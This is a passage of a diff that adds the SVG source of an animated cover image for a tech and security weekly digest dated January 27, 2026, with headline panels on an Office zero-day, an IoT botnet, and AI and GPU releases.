45h2v1h-2zM41 45h2v1h-2zM45 45h1v1h-1zM48 45h1v1h-1zM0 46h1v1h-1zM2 46h3v1h-3zM6 46h1v1h-1zM9 46h1v1h-1zM11 46h2v1h-2zM14 46h1v1h-1zM17 46h2v1h-2zM20 46h1v1h-1zM25 46h1v1h-1zM27 46h2v1h-2zM33 46h1v1h-1zM36 46h1v1h-1zM40 46h1v1h-1zM43 46h1v1h-1zM46 46h3v1h-3zM0 47h1v1h-1zM6 47h1v1h-1zM11 47h1v1h-1zM16 47h2v1h-2zM19 47h2v1h-2zM24 47h1v1h-1zM27 47h2v1h-2zM30 47h1v1h-1zM36 47h3v1h-3zM40 47h1v1h-1zM46 47h2v1h-2zM0 48h7v1h-7zM8 48h1v1h-1zM12 48h2v1h-2zM15 48h1v1h-1zM18 48h4v1h-4zM23 48h1v1h-1zM26 48h3v1h-3zM34 48h4v1h-4zM40 48h1v1h-1zM43 48h6v1h-6z"/>
+  </g>
+</g>
+<text x="1122" y="614" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="700" fill="#F5F7FA" text-anchor="middle">scan / full post</text>
+</svg>

--- a/assets/images/2026-01-27-Tech_Security_Weekly_Digest_MS_Office_Zero_Day_Kimi_K25_Kimwolf_Botnet_AWS_G7e.svg
+++ b/assets/images/2026-01-27-Tech_Security_Weekly_Digest_MS_Office_Zero_Day_Kimi_K25_Kimwolf_Botnet_AWS_G7e.svg
@@ -1,0 +1,410 @@
+<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1200 630" width="1200" height="630" role="img" aria-label="Research-based weekly digest cover: MS Office CVE-2026-21509 zero-day exploited in wild, Kimwolf Badbox 2.0 botnet infects 2M IoT devices, Kimi K2.5 open-source visual agent and AWS G7e Blackwell GPU launch">
+<!-- profile: high-quality-cover (L14 Timeline, research-based, batch1-locked) -->
+<title>Weekly digest 2026-01-27 timeline: MS Office Zero-Day (Jan 21), Kimwolf Botnet (Jan 24), Kimi K2.5 + AWS G7e (Jan 27)</title>
+<defs>
+  <linearGradient id="bgSpread" x1="0%" y1="0%" x2="100%" y2="100%">
+    <stop offset="0%" stop-color="#0B1220"/>
+    <stop offset="55%" stop-color="#0E1532"/>
+    <stop offset="100%" stop-color="#121035"/>
+  </linearGradient>
+  <linearGradient id="colA" x1="0%" y1="0%" x2="0%" y2="100%">
+    <stop offset="0%" stop-color="#122542"/>
+    <stop offset="100%" stop-color="#0A1830"/>
+  </linearGradient>
+  <linearGradient id="colB" x1="0%" y1="0%" x2="0%" y2="100%">
+    <stop offset="0%" stop-color="#2E1A0A"/>
+    <stop offset="100%" stop-color="#1E1006"/>
+  </linearGradient>
+  <linearGradient id="colC" x1="0%" y1="0%" x2="0%" y2="100%">
+    <stop offset="0%" stop-color="#0A2220"/>
+    <stop offset="100%" stop-color="#061614"/>
+  </linearGradient>
+  <linearGradient id="timelineGrad" x1="0%" y1="0%" x2="100%" y2="0%">
+    <stop offset="0%" stop-color="#4ADE80" stop-opacity="0.2"/>
+    <stop offset="35%" stop-color="#3A86FF" stop-opacity="0.9"/>
+    <stop offset="65%" stop-color="#FFB703" stop-opacity="0.9"/>
+    <stop offset="100%" stop-color="#2DD4BF"/>
+  </linearGradient>
+  <radialGradient id="glowBlue" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#3A86FF" stop-opacity="0.6"/>
+    <stop offset="100%" stop-color="#3A86FF" stop-opacity="0"/>
+  </radialGradient>
+  <radialGradient id="glowAmber" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#FFB703" stop-opacity="0.6"/>
+    <stop offset="100%" stop-color="#FFB703" stop-opacity="0"/>
+  </radialGradient>
+  <radialGradient id="glowTeal" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#2DD4BF" stop-opacity="0.6"/>
+    <stop offset="100%" stop-color="#2DD4BF" stop-opacity="0"/>
+  </radialGradient>
+  <pattern id="dotGrid" x="0" y="0" width="40" height="40" patternUnits="userSpaceOnUse">
+    <circle cx="20" cy="20" r="0.8" fill="#2A3256" opacity="0.55"/>
+  </pattern>
+  <filter id="softShadow" x="-10%" y="-10%" width="130%" height="130%">
+    <feGaussianBlur in="SourceAlpha" stdDeviation="2.6"/>
+    <feOffset dx="1" dy="3"/>
+    <feComponentTransfer><feFuncA type="linear" slope="0.55"/></feComponentTransfer>
+    <feMerge><feMergeNode/><feMergeNode in="SourceGraphic"/></feMerge>
+  </filter>
+  <filter id="textShadow" x="-5%" y="-5%" width="110%" height="110%">
+    <feGaussianBlur in="SourceAlpha" stdDeviation="1.2"/>
+    <feOffset dx="0" dy="1.5"/>
+    <feComponentTransfer><feFuncA type="linear" slope="0.8"/></feComponentTransfer>
+    <feMerge><feMergeNode/><feMergeNode in="SourceGraphic"/></feMerge>
+  </filter>
+</defs>
+
+<rect width="1200" height="630" fill="url(#bgSpread)"/>
+<rect width="1200" height="630" fill="url(#dotGrid)"/>
+
+<!-- Background column glows -->
+<circle cx="240" cy="390" r="140" fill="url(#glowBlue)">
+  <animate attributeName="opacity" values="0.5;0.85;0.5" dur="6.4s" repeatCount="indefinite"/>
+</circle>
+<circle cx="620" cy="390" r="140" fill="url(#glowAmber)">
+  <animate attributeName="opacity" values="0.5;0.85;0.5" dur="5.6s" repeatCount="indefinite"/>
+</circle>
+<circle cx="1000" cy="390" r="140" fill="url(#glowTeal)">
+  <animate attributeName="opacity" values="0.5;0.85;0.5" dur="7.0s" repeatCount="indefinite"/>
+</circle>
+
+<!-- Header stripe -->
+<rect x="0" y="0" width="1200" height="56" fill="#050813" opacity="0.92"/>
+<text x="36" y="36" font-family="Inter, Helvetica, Arial, sans-serif" font-size="18" font-weight="700" fill="#8FB8FF" letter-spacing="2.5">WEEKLY DIGEST</text>
+<text x="1164" y="36" font-family="Inter, Helvetica, Arial, sans-serif" font-size="15" font-weight="600" fill="#7DA3D9" letter-spacing="1.5" text-anchor="end">2026.01.27</text>
+<rect x="0" y="54" width="1200" height="2" fill="#8FB8FF" opacity="0.85">
+  <animate attributeName="opacity" values="0.4;1;0.4" dur="4.8s" repeatCount="indefinite"/>
+</rect>
+
+<!-- Starfield ambient dots -->
+<g fill="#8FB8FF" opacity="0.55">
+  <circle cx="160" cy="78" r="1.2"><animate attributeName="opacity" values="0.2;1;0.2" dur="3.1s" repeatCount="indefinite"/></circle>
+  <circle cx="420" cy="86" r="1.0"/>
+  <circle cx="720" cy="80" r="1.3"/>
+  <circle cx="1040" cy="88" r="0.9"/>
+</g>
+
+<!-- Week title -->
+<g>
+  <text x="60" y="96" font-family="Inter, Helvetica, Arial, sans-serif" font-size="13" font-weight="700" fill="#9FD3B0" letter-spacing="3">THIS WEEK  /  JAN 21 - 27</text>
+  <text x="60" y="130" font-family="Inter, Helvetica, Arial, sans-serif" font-size="28" font-weight="800" fill="#F5F7FA" filter="url(#textShadow)">Zero-Day, Botnet, and AI Breakthroughs</text>
+</g>
+
+<!-- Timeline axis with gradient -->
+<line x1="60" y1="170" x2="1140" y2="170" stroke="url(#timelineGrad)" stroke-width="3.4" stroke-linecap="round"/>
+<!-- Moving traveler along axis -->
+<circle r="5" fill="#F5F7FA" stroke="#8FB8FF" stroke-width="1.4">
+  <animate attributeName="cx" values="60;1140;60" dur="11s" repeatCount="indefinite"/>
+  <animate attributeName="cy" values="170;170;170" dur="11s" repeatCount="indefinite"/>
+  <animate attributeName="opacity" values="0;1;1;1;0" dur="11s" repeatCount="indefinite"/>
+</circle>
+
+<!-- Date tick labels: JAN 21-27 -->
+<g font-family="Inter, monospace" font-size="10" font-weight="700" fill="#7DA3D9">
+  <line x1="80" y1="163" x2="80" y2="177" stroke="#4A6AA0" stroke-width="1.2"/>
+  <text x="80" y="194" text-anchor="middle">JAN 21</text>
+  <line x1="240" y1="163" x2="240" y2="177" stroke="#4A6AA0" stroke-width="1.2"/>
+  <text x="240" y="194" text-anchor="middle" fill="#8FB8FF">JAN 22</text>
+  <line x1="400" y1="163" x2="400" y2="177" stroke="#4A6AA0" stroke-width="1.2"/>
+  <text x="400" y="194" text-anchor="middle">JAN 23</text>
+  <line x1="600" y1="163" x2="600" y2="177" stroke="#4A6AA0" stroke-width="1.2"/>
+  <text x="600" y="194" text-anchor="middle" fill="#FFB703">JAN 24</text>
+  <line x1="800" y1="163" x2="800" y2="177" stroke="#4A6AA0" stroke-width="1.2"/>
+  <text x="800" y="194" text-anchor="middle">JAN 25</text>
+  <line x1="980" y1="163" x2="980" y2="177" stroke="#4A6AA0" stroke-width="1.2"/>
+  <text x="980" y="194" text-anchor="middle">JAN 26</text>
+  <line x1="1120" y1="163" x2="1120" y2="177" stroke="#4A6AA0" stroke-width="1.2"/>
+  <text x="1120" y="194" text-anchor="middle" fill="#2DD4BF">JAN 27</text>
+</g>
+
+<!-- Event anchor dots -->
+<g>
+  <!-- Col A anchor at JAN 22 (x=240) -->
+  <g transform="translate(240,170)">
+    <circle r="22" fill="url(#glowBlue)">
+      <animate attributeName="r" values="20;32;20" dur="2.8s" repeatCount="indefinite"/>
+      <animate attributeName="opacity" values="0.6;1;0.6" dur="2.8s" repeatCount="indefinite"/>
+    </circle>
+    <circle r="10" fill="#0A1B2E" stroke="#3A86FF" stroke-width="3" filter="url(#softShadow)"/>
+    <circle r="3.5" fill="#8FB8FF">
+      <animate attributeName="opacity" values="1;0.3;1" dur="1.6s" repeatCount="indefinite"/>
+    </circle>
+  </g>
+  <!-- Col B anchor at JAN 24 (x=600) -->
+  <g transform="translate(600,170)">
+    <circle r="22" fill="url(#glowAmber)">
+      <animate attributeName="r" values="20;32;20" dur="2.8s" begin="0.4s" repeatCount="indefinite"/>
+      <animate attributeName="opacity" values="0.6;1;0.6" dur="2.8s" begin="0.4s" repeatCount="indefinite"/>
+    </circle>
+    <circle r="10" fill="#1E1006" stroke="#FFB703" stroke-width="3" filter="url(#softShadow)"/>
+    <circle r="3.5" fill="#FFD58A">
+      <animate attributeName="opacity" values="1;0.3;1" dur="1.8s" repeatCount="indefinite"/>
+    </circle>
+  </g>
+  <!-- Col C anchor at JAN 27 (x=1120) -->
+  <g transform="translate(1120,170)">
+    <circle r="22" fill="url(#glowTeal)">
+      <animate attributeName="r" values="20;32;20" dur="2.8s" begin="0.8s" repeatCount="indefinite"/>
+      <animate attributeName="opacity" values="0.6;1;0.6" dur="2.8s" begin="0.8s" repeatCount="indefinite"/>
+    </circle>
+    <circle r="10" fill="#061614" stroke="#2DD4BF" stroke-width="3" filter="url(#softShadow)"/>
+    <circle r="3.5" fill="#99F6E4">
+      <animate attributeName="opacity" values="1;0.3;1" dur="1.7s" repeatCount="indefinite"/>
+    </circle>
+  </g>
+</g>
+
+<!-- Connector dashes from anchor to column top -->
+<line x1="240" y1="180" x2="240" y2="216" stroke="#3A86FF" stroke-width="1.4" stroke-dasharray="3 3" opacity="0.7"/>
+<line x1="600" y1="180" x2="600" y2="216" stroke="#FFB703" stroke-width="1.4" stroke-dasharray="3 3" opacity="0.7"/>
+<line x1="1120" y1="180" x2="960" y2="216" stroke="#2DD4BF" stroke-width="1.4" stroke-dasharray="3 3" opacity="0.7"/>
+
+<!-- ============================================================ -->
+<!-- COL A: MS Office Zero-Day CVE-2026-21509 (Jan 21-22) -->
+<!-- ============================================================ -->
+<g transform="translate(72,216)">
+  <rect x="0" y="0" width="336" height="374" rx="14" fill="url(#colA)" stroke="#3A86FF" stroke-width="1.6" opacity="0.97"/>
+  <rect x="0" y="0" width="336" height="4" fill="#3A86FF" opacity="0.7"/>
+  <g filter="url(#textShadow)">
+    <text x="20" y="28" font-family="Inter, Helvetica, Arial, sans-serif" font-size="11" font-weight="700" fill="#8FB8FF" letter-spacing="2.4">CRITICAL  /  ZERO-DAY</text>
+    <text x="20" y="56" font-family="Inter, Helvetica, Arial, sans-serif" font-size="21" font-weight="800" fill="#F5F7FA">MS Office Zero-Day</text>
+    <text x="20" y="80" font-family="Inter, Helvetica, Arial, sans-serif" font-size="13" font-weight="500" fill="#BFC9D9">CVE-2026-21509 actively exploited</text>
+  </g>
+  <!-- Scene: Office document + exploit shield breach -->
+  <g transform="translate(168,140)">
+    <!-- Document icon -->
+    <g filter="url(#softShadow)">
+      <rect x="-34" y="-30" width="52" height="60" rx="4" fill="#0A1B2E" stroke="#3A86FF" stroke-width="1.6"/>
+      <rect x="-26" y="-18" width="36" height="4" rx="1" fill="#3A86FF" opacity="0.7"/>
+      <rect x="-26" y="-10" width="36" height="4" rx="1" fill="#3A86FF" opacity="0.5"/>
+      <rect x="-26" y="-2" width="28" height="4" rx="1" fill="#3A86FF" opacity="0.4"/>
+      <text x="-8" y="26" text-anchor="middle" font-family="Inter, monospace" font-size="7" font-weight="800" fill="#8FB8FF">OFFICE</text>
+      <!-- Crack / exploit indicator -->
+      <path d="M6,-30 L18,-10 L10,-10 L22,10" stroke="#E63946" stroke-width="2" fill="none" stroke-linecap="round">
+        <animate attributeName="stroke-opacity" values="0.3;1;0.3" dur="1.4s" repeatCount="indefinite"/>
+      </path>
+    </g>
+    <!-- Shield breach -->
+    <g transform="translate(42,0)">
+      <path d="M0,-20 L14,-12 L14,6 Q14,18 0,24 Q-14,18 -14,6 L-14,-12 Z" fill="none" stroke="#E63946" stroke-width="1.8" stroke-dasharray="3 2">
+        <animate attributeName="stroke-opacity" values="0.4;1;0.4" dur="2.0s" repeatCount="indefinite"/>
+      </path>
+      <text x="0" y="5" text-anchor="middle" font-family="Inter, monospace" font-size="8" font-weight="800" fill="#E63946">7.8</text>
+    </g>
+    <!-- Exploit bytes floating -->
+    <g font-family="Inter, monospace" font-size="7" font-weight="700" fill="#8FB8FF" opacity="0.6">
+      <text x="-70" y="-10">0x41</text>
+      <text x="-70" y="4">ROP</text>
+      <text x="-70" y="18">NOP</text>
+    </g>
+  </g>
+  <!-- Attack chain (3 steps) -->
+  <g transform="translate(28,208)">
+    <g>
+      <rect x="0" y="0" width="280" height="34" rx="6" fill="#0A1B2E" stroke="#3A86FF" stroke-width="1.2"/>
+      <circle cx="18" cy="17" r="7" fill="#3A86FF"/>
+      <text x="18" y="21" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#FFFFFF">1</text>
+      <text x="36" y="22" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#F5F7FA">Phishing doc opens Office</text>
+    </g>
+    <line x1="18" y1="38" x2="18" y2="50" stroke="#3A86FF" stroke-width="1.4" stroke-dasharray="2 2"/>
+    <g transform="translate(0,54)">
+      <rect x="0" y="0" width="280" height="34" rx="6" fill="#0A1B2E" stroke="#3A86FF" stroke-width="1.2"/>
+      <circle cx="18" cy="17" r="7" fill="#3A86FF"/>
+      <text x="18" y="21" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#FFFFFF">2</text>
+      <text x="36" y="22" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#F5F7FA">Security bypass via 21509</text>
+    </g>
+    <line x1="18" y1="92" x2="18" y2="104" stroke="#3A86FF" stroke-width="1.4" stroke-dasharray="2 2"/>
+    <g transform="translate(0,108)">
+      <rect x="0" y="0" width="280" height="34" rx="6" fill="#12283F" stroke="#8FB8FF" stroke-width="1.4"/>
+      <circle cx="18" cy="17" r="7" fill="#8FB8FF"/>
+      <text x="18" y="21" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#0A1020">3</text>
+      <text x="36" y="22" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="800" fill="#F5F7FA">Malcode executes in-session</text>
+    </g>
+  </g>
+  <!-- KPI pill -->
+  <g transform="translate(28,332)" filter="url(#softShadow)">
+    <rect x="0" y="0" width="280" height="32" rx="8" fill="#12283F" stroke="#3A86FF" stroke-width="1.6"/>
+    <text x="14" y="21" font-family="Inter, monospace" font-size="11" font-weight="700" fill="#8FB8FF">CVE</text>
+    <text x="140" y="22" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="15" font-weight="900" fill="#F5F7FA">2026-21509</text>
+    <text x="266" y="21" text-anchor="end" font-family="Inter, monospace" font-size="10" font-weight="700" fill="#E63946">CVSS 7.8</text>
+  </g>
+</g>
+
+<!-- ============================================================ -->
+<!-- COL B: Kimwolf / Badbox 2.0 Botnet (Jan 24) -->
+<!-- ============================================================ -->
+<g transform="translate(432,216)">
+  <rect x="0" y="0" width="336" height="374" rx="14" fill="url(#colB)" stroke="#FFB703" stroke-width="1.6" opacity="0.97"/>
+  <rect x="0" y="0" width="336" height="4" fill="#FFB703" opacity="0.7"/>
+  <g filter="url(#textShadow)">
+    <text x="20" y="28" font-family="Inter, Helvetica, Arial, sans-serif" font-size="11" font-weight="700" fill="#FFB703" letter-spacing="2.4">CRITICAL  /  IoT BOTNET</text>
+    <text x="20" y="56" font-family="Inter, Helvetica, Arial, sans-serif" font-size="21" font-weight="800" fill="#F5F7FA">Kimwolf / Badbox 2.0</text>
+    <text x="20" y="80" font-family="Inter, Helvetica, Arial, sans-serif" font-size="13" font-weight="500" fill="#FFD58A">2M+ IoT devices infected</text>
+  </g>
+  <!-- Scene: IoT device hub with infected nodes -->
+  <g transform="translate(168,140)">
+    <!-- Central router/hub -->
+    <g filter="url(#softShadow)">
+      <rect x="-38" y="-18" width="76" height="36" rx="5" fill="#1E1006" stroke="#FFB703" stroke-width="1.8"/>
+      <circle cx="-18" cy="0" r="3.5" fill="#E63946">
+        <animate attributeName="opacity" values="0.3;1;0.3" dur="1.1s" repeatCount="indefinite"/>
+      </circle>
+      <circle cx="-6" cy="0" r="3.5" fill="#FFB703">
+        <animate attributeName="opacity" values="0.3;1;0.3" dur="1.5s" begin="0.3s" repeatCount="indefinite"/>
+      </circle>
+      <circle cx="6" cy="0" r="3.5" fill="#E63946">
+        <animate attributeName="opacity" values="0.3;1;0.3" dur="1.3s" begin="0.6s" repeatCount="indefinite"/>
+      </circle>
+      <text x="0" y="26" text-anchor="middle" font-family="Inter, monospace" font-size="7" font-weight="800" fill="#FFB703">KIMWOLF C2</text>
+    </g>
+    <!-- Infected IoT spokes (5 nodes) -->
+    <g stroke="#FFB703" stroke-width="1" stroke-dasharray="3 3" fill="none" opacity="0.7">
+      <line x1="-38" y1="-10" x2="-68" y2="-32"/>
+      <line x1="38" y1="-10" x2="68" y2="-32"/>
+      <line x1="-38" y1="10" x2="-68" y2="32"/>
+      <line x1="38" y1="10" x2="68" y2="32"/>
+      <line x1="0" y1="-18" x2="0" y2="-52"/>
+    </g>
+    <g fill="#FFB703">
+      <circle cx="-68" cy="-32" r="4"><animate attributeName="opacity" values="0.3;1;0.3" dur="1.7s" repeatCount="indefinite"/></circle>
+      <circle cx="68" cy="-32" r="4"><animate attributeName="opacity" values="0.3;1;0.3" dur="2.0s" begin="0.3s" repeatCount="indefinite"/></circle>
+      <circle cx="-68" cy="32" r="4"><animate attributeName="opacity" values="0.3;1;0.3" dur="1.9s" begin="0.5s" repeatCount="indefinite"/></circle>
+      <circle cx="68" cy="32" r="4"><animate attributeName="opacity" values="0.3;1;0.3" dur="2.1s" begin="0.7s" repeatCount="indefinite"/></circle>
+      <circle cx="0" cy="-52" r="4"><animate attributeName="opacity" values="0.3;1;0.3" dur="1.5s" begin="0.2s" repeatCount="indefinite"/></circle>
+    </g>
+    <!-- Labels -->
+    <g font-family="Inter, monospace" font-size="6" font-weight="700" fill="#FFD58A">
+      <text x="-80" y="-34" text-anchor="middle">TV BOX</text>
+      <text x="80" y="-34" text-anchor="middle">ROUTER</text>
+      <text x="-80" y="44" text-anchor="middle">TABLET</text>
+      <text x="80" y="44" text-anchor="middle">PHONE</text>
+      <text x="0" y="-58" text-anchor="middle">IoT</text>
+    </g>
+  </g>
+  <!-- Attack chain (3 steps) -->
+  <g transform="translate(28,208)">
+    <g>
+      <rect x="0" y="0" width="280" height="34" rx="6" fill="#1E1006" stroke="#FFB703" stroke-width="1.2"/>
+      <circle cx="18" cy="17" r="7" fill="#FFB703"/>
+      <text x="18" y="21" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#1A1202">1</text>
+      <text x="36" y="22" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#F5F7FA">Supply-chain backdoor in firmware</text>
+    </g>
+    <line x1="18" y1="38" x2="18" y2="50" stroke="#FFB703" stroke-width="1.4" stroke-dasharray="2 2"/>
+    <g transform="translate(0,54)">
+      <rect x="0" y="0" width="280" height="34" rx="6" fill="#1E1006" stroke="#FFB703" stroke-width="1.2"/>
+      <circle cx="18" cy="17" r="7" fill="#FFB703"/>
+      <text x="18" y="21" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#1A1202">2</text>
+      <text x="36" y="22" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#F5F7FA">C2 enroll - proxy + DDoS</text>
+    </g>
+    <line x1="18" y1="92" x2="18" y2="104" stroke="#FFB703" stroke-width="1.4" stroke-dasharray="2 2"/>
+    <g transform="translate(0,108)">
+      <rect x="0" y="0" width="280" height="34" rx="6" fill="#2A1A0C" stroke="#FFD58A" stroke-width="1.4"/>
+      <circle cx="18" cy="17" r="7" fill="#FFD58A"/>
+      <text x="18" y="21" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#1A1202">3</text>
+      <text x="36" y="22" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="800" fill="#F5F7FA">Corp/gov network infiltration</text>
+    </g>
+  </g>
+  <!-- KPI pill -->
+  <g transform="translate(28,332)" filter="url(#softShadow)">
+    <rect x="0" y="0" width="280" height="32" rx="8" fill="#2A1A0C" stroke="#FFB703" stroke-width="1.6"/>
+    <text x="14" y="21" font-family="Inter, monospace" font-size="11" font-weight="700" fill="#FFB703">BOTS</text>
+    <text x="140" y="22" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="15" font-weight="900" fill="#F5F7FA">2,000,000+</text>
+    <text x="266" y="21" text-anchor="end" font-family="Inter, monospace" font-size="10" font-weight="700" fill="#FFB703">IoT</text>
+  </g>
+</g>
+
+<!-- ============================================================ -->
+<!-- COL C: Kimi K2.5 + AWS G7e (Jan 27) -->
+<!-- ============================================================ -->
+<g transform="translate(792,216)">
+  <rect x="0" y="0" width="336" height="374" rx="14" fill="url(#colC)" stroke="#2DD4BF" stroke-width="1.6" opacity="0.97"/>
+  <rect x="0" y="0" width="336" height="4" fill="#2DD4BF" opacity="0.7"/>
+  <g filter="url(#textShadow)">
+    <text x="20" y="28" font-family="Inter, Helvetica, Arial, sans-serif" font-size="11" font-weight="700" fill="#2DD4BF" letter-spacing="2.4">HIGH  /  AI + CLOUD</text>
+    <text x="20" y="56" font-family="Inter, Helvetica, Arial, sans-serif" font-size="21" font-weight="800" fill="#F5F7FA">Kimi K2.5 + AWS G7e</text>
+    <text x="20" y="80" font-family="Inter, Helvetica, Arial, sans-serif" font-size="13" font-weight="500" fill="#99F6E4">Open-source agent + Blackwell GPU</text>
+  </g>
+  <!-- Scene: AI brain + GPU chip illustration -->
+  <g transform="translate(168,140)">
+    <!-- AI neural orb -->
+    <g filter="url(#softShadow)">
+      <circle cx="-44" cy="0" r="28" fill="#061614" stroke="#2DD4BF" stroke-width="1.6"/>
+      <!-- neural nodes inside orb -->
+      <g stroke="#2DD4BF" stroke-width="0.8" opacity="0.7">
+        <line x1="-44" y1="-14" x2="-30" y2="-4"/>
+        <line x1="-44" y1="-14" x2="-54" y2="-4"/>
+        <line x1="-30" y1="-4" x2="-38" y2="10"/>
+        <line x1="-54" y1="-4" x2="-44" y2="10"/>
+        <line x1="-38" y1="10" x2="-50" y2="10"/>
+      </g>
+      <circle cx="-44" cy="-14" r="3.5" fill="#2DD4BF"><animate attributeName="opacity" values="1;0.3;1" dur="1.6s" repeatCount="indefinite"/></circle>
+      <circle cx="-30" cy="-4" r="2.5" fill="#99F6E4"/>
+      <circle cx="-54" cy="-4" r="2.5" fill="#99F6E4"/>
+      <circle cx="-38" cy="10" r="2.5" fill="#2DD4BF"><animate attributeName="opacity" values="1;0.3;1" dur="2.0s" begin="0.5s" repeatCount="indefinite"/></circle>
+      <circle cx="-50" cy="10" r="2.5" fill="#99F6E4"/>
+      <text x="-44" y="36" text-anchor="middle" font-family="Inter, monospace" font-size="7" font-weight="800" fill="#2DD4BF">KIMI K2.5</text>
+    </g>
+    <!-- GPU chip -->
+    <g transform="translate(50,0)" filter="url(#softShadow)">
+      <rect x="-20" y="-20" width="40" height="40" rx="3" fill="#061A18" stroke="#2DD4BF" stroke-width="1.6"/>
+      <!-- chip grid -->
+      <g stroke="#2DD4BF" stroke-width="0.6" opacity="0.5">
+        <line x1="-10" y1="-20" x2="-10" y2="20"/>
+        <line x1="0" y1="-20" x2="0" y2="20"/>
+        <line x1="10" y1="-20" x2="10" y2="20"/>
+        <line x1="-20" y1="-10" x2="20" y2="-10"/>
+        <line x1="-20" y1="0" x2="20" y2="0"/>
+        <line x1="-20" y1="10" x2="20" y2="10"/>
+      </g>
+      <rect x="-6" y="-6" width="12" height="12" rx="1" fill="#2DD4BF" opacity="0.3"/>
+      <text x="0" y="36" text-anchor="middle" font-family="Inter, monospace" font-size="7" font-weight="800" fill="#2DD4BF">G7e GPU</text>
+      <!-- heat glow -->
+      <circle cx="0" cy="0" r="14" fill="#2DD4BF" opacity="0.1">
+        <animate attributeName="opacity" values="0.1;0.25;0.1" dur="2.2s" repeatCount="indefinite"/>
+      </circle>
+    </g>
+  </g>
+  <!-- Attack chain (3 steps - features/milestones) -->
+  <g transform="translate(28,208)">
+    <g>
+      <rect x="0" y="0" width="280" height="34" rx="6" fill="#061614" stroke="#2DD4BF" stroke-width="1.2"/>
+      <circle cx="18" cy="17" r="7" fill="#2DD4BF"/>
+      <text x="18" y="21" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#06160E">1</text>
+      <text x="36" y="22" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#F5F7FA">Kimi K2.5 open-sourced</text>
+    </g>
+    <line x1="18" y1="38" x2="18" y2="50" stroke="#2DD4BF" stroke-width="1.4" stroke-dasharray="2 2"/>
+    <g transform="translate(0,54)">
+      <rect x="0" y="0" width="280" height="34" rx="6" fill="#061614" stroke="#2DD4BF" stroke-width="1.2"/>
+      <circle cx="18" cy="17" r="7" fill="#2DD4BF"/>
+      <text x="18" y="21" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#06160E">2</text>
+      <text x="36" y="22" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#F5F7FA">HLE 50.2% SOTA, 100 sub-agents</text>
+    </g>
+    <line x1="18" y1="92" x2="18" y2="104" stroke="#2DD4BF" stroke-width="1.4" stroke-dasharray="2 2"/>
+    <g transform="translate(0,108)">
+      <rect x="0" y="0" width="280" height="34" rx="6" fill="#0A2220" stroke="#99F6E4" stroke-width="1.4"/>
+      <circle cx="18" cy="17" r="7" fill="#99F6E4"/>
+      <text x="18" y="21" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#06160E">3</text>
+      <text x="36" y="22" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="800" fill="#F5F7FA">AWS G7e: 2.3x inference boost</text>
+    </g>
+  </g>
+  <!-- KPI pill -->
+  <g transform="translate(28,332)" filter="url(#softShadow)">
+    <rect x="0" y="0" width="280" height="32" rx="8" fill="#0A2220" stroke="#2DD4BF" stroke-width="1.6"/>
+    <text x="14" y="21" font-family="Inter, monospace" font-size="11" font-weight="700" fill="#2DD4BF">BENCH</text>
+    <text x="140" y="22" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="15" font-weight="900" fill="#F5F7FA">HLE 50.2%</text>
+    <text x="266" y="21" text-anchor="end" font-family="Inter, monospace" font-size="10" font-weight="700" fill="#2DD4BF">SOTA</text>
+  </g>
+</g>
+
+<!-- QR placeholder group (will be replaced by add_cover_qr.py) -->
+<!-- qr-placeholder -->
+
+<!-- cover-qr: https://tech.2twodragon.com/posts/2026/01/27/Tech_Security_Weekly_Digest_MS_Office_Zero_Day_Kimi_K25_Kimwolf_Botnet_AWS_G7e/ : 49x49 -->
+<g transform="translate(1080,504)" filter="url(#softShadow)">
+  <rect x="-8" y="-8" width="100" height="100" rx="6" fill="#FFFFFF"/>
+  <g transform="scale(1.714286)" fill="#0A1020">
